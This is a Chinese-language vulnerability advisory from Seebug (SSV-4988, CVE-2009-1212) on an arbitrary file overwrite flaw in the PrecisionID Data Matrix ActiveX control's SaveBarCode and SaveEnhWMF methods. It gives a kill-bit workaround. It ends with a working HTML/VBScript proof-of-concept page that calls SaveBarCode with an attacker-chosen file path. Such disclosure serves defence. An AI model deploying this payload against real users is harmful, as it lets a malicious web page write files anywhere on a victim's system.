Lucene search
RootSSV:4988HistoryApr 02, 2009 - 12:00 a.m.
PrecisionID Data Matrix Barcode ActiveX控件任意文件覆盖漏洞
2009-04-0200:00:00
Root
www.seebug.org
14
0.225 Low
EPSS
Percentile
96.5%
BUGTRAQ ID: 34322
CVE(CAN) ID: CVE-2009-1212
PrecisionID Data Matrix是用于生成二维条码的工具。
PrecisionID所提供的DMATRIXLib.Datamatrix ActiveX控件没有正确地验证用户对SaveBarCode()和SaveEnhWMF()方式所提交的输入参数:
Sub SaveBarCode (
ByVal path As String
)
Sub SaveEnhWMF (
ByVal path As String
)
如果用户受骗访问了恶意网页并向上述方式传送了恶意参数的话,就可能导致向系统上任意位置写入文件。
PrecisionID Data Matrix ActiveX
临时解决方法:
- 为clsid:6C951D10-B07F-11DB-A6ED-0050C2490048设置kill-bit。
厂商补丁:
PrecisionID
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href=“http://www.precisionid.com/” target=“_blank”>http://www.precisionid.com/</a>
<html>
<object classid=\'clsid:6C951D10-B07F-11DB-A6ED-0050C2490048\' id=\'target\' />
<script language=\'vbscript\'>
targetFile = \"C:\\WINDOWS\\system32\\PRECIS~2.DLL\"
prototype = \"Sub SaveBarCode ( ByVal path As String )\"
memberName = \"SaveBarCode\"
progid = \"DMATRIXLib.Datamatrix\"
argCount = 1
arg1=\"C:\\sh2kerr.pwn\"
target.SaveBarCode arg1
</script>
</html>
Related
cve
cve
CVE-2009-1212
2009-04-01 10:30:00
prion
prion
Design/Logic Flaw
2009-04-01 10:30:00
cvelist
cvelist
CVE-2009-1212
2009-04-01 10:00:00
nvd
nvd
CVE-2009-1212
2009-04-01 10:30:00